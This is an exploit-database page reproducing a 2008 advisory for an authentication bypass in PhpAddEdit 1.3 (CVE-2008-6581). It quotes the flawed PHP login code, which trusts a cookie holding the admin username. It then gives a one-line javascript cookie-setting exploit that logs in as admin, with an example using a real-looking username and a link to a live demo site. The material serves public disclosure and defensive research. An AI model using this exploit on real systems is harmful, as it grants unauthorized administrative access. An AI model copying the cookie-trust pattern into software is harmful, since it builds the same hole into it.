Lucene search
+L

PhpAddEdit 1.3 - 'cookie' Authentication Bypass

🗓️ 11 Dec 2008 00:00:00Reported by x0rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

PHPAddEdit 1.3 Login Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6581
11 Dec 200800:00
circl
cve
CVE
CVE-2008-6581
2 Apr 200915:00
cve
cvelist
Cvelist
CVE-2008-6581
2 Apr 200915:00
cvelist
euvd
EUVD
EUVD-2008-6544
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6581
2 Apr 200915:30
nvd
prion
Prion
Authentication flaw
2 Apr 200915:30
prion
-------------------------------------
   PhpAddEdit 1.3 Login By Pass
-------------------------------------

Found By: x0r ( Evolution Team )
Email: [email protected]
-------------------------------------

Bug In: Addedit-login.php

		if (!$login_error) {
			// --- Set admin cookie so favorite form field will show up when I use
the site...
			if ($_POST["rememberme"]) {
				$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));
				setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);
			} else {
				setcookie("addedit", $_POST["adminuser"]);
			}
			Header("Location:  ./");
		}
	}

Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^
-------------------------------------

Exploit:

javascript:document.cookie = "addedit=[adminuser]; path=/";

es:

javascript:document.cookie = "addedit=x0r; path=/";
--------------------------------------
Live Demo: http://www.phpaddedit.com/demo/
--------------------------------------
Greetz: Amore oggi +65 ti amo troppo.

# milw0rm.com [2008-12-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03326
39